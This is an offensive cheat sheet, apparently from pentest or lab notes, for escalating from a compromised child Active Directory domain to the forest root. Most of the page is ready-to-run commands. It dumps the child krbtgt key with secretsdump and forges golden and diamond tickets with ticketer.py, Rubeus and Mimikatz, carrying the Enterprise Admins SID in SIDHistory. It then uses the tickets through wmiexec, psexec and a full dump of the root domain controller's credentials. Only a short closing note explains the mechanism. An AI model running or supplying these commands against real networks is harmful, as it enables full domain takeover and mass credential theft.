Parent-child escalation abuses the automatic two-way transitive trust inside a forest. If we compromise a child domain enough to obtain its krbtgt key, we can forge a child-domain TGT that carries the parent or forest-root privileged SID in SIDHistory.
Variables
export CHILD_DOMAIN=child.ootw.local
export CHILD_DC=10.10.10.210
export ROOT_DOMAIN=ootw.local
export ROOT_DC=10.10.10.200
export CHILD_SID='S-1-5-21-1111111111-2222222222-3333333333'
export ROOT_SID='S-1-5-21-4444444444-5555555555-6666666666'
Get child domain SID
lookupsid.py child.ootw.local/childadmin:'Password123!'@10.10.10.210
ldapsearch -LLL -x -H ldap://10.10.10.210 -D 'child.ootw.local\childadmin' -w 'Password123!' -b 'DC=child,DC=ootw,DC=local' '(objectClass=domain)' objectSid
Get root Enterprise Admins SID
ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'child.ootw.local\childadmin' -w 'Password123!' -b 'DC=ootw,DC=local' '(&(samAccountType=268435456)(samAccountName=Enterprise Admins))' objectSid
Dump child krbtgt
secretsdump.py child.ootw.local/childadmin:'Password123!'@10.10.10.210 -just-dc-user krbtgt
Forge from Linux with AES
ticketer.py -aesKey <CHILD_KRBTGT_AES256> -domain child.ootw.local -domain-sid $CHILD_SID -extra-sid $ROOT_SID-519 Administrator
export KRB5CCNAME=Administrator.ccache
klist
Use the ticket against the root domain
wmiexec.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200
psexec.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200
secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc
Forge from Windows with Rubeus
Rubeus.exe golden /aes256:<CHILD_KRBTGT_AES256> /user:Administrator /domain:child.ootw.local /sid:<CHILD_SID> /sids:<ROOT_SID>-519 /ptt
klist
dir \\dc01.ootw.local\c$
Forge from Windows with Mimikatz
mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /domain:child.ootw.local /sid:<CHILD_SID> /krbtgt:<CHILD_KRBTGT_NTLM> /sids:<ROOT_SID>-519 /ptt" "exit"
dir \\dc01.ootw.local\c$
Diamond ticket variant
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /domain:child.ootw.local /sids:<ROOT_SID>-519 /krbkey:<CHILD_KRBTGT_AES256> /ptt
Important values
/domain child domain FQDN
/sid child domain SID
/sids parent or forest-root privileged SID, commonly <ROOT_SID>-519 for Enterprise Admins
/aes256 child domain krbtgt AES256 key
Notes
This is not a generic golden ticket. The escalation comes from the extra SID in the PAC. The forged identity belongs to the child domain, but authorization in the parent domain sees the injected parent/root SID.
Inside a normal parent-child path, this is why child domain compromise can become forest compromise. For external and forest trusts, SID filtering and trust boundaries change the result.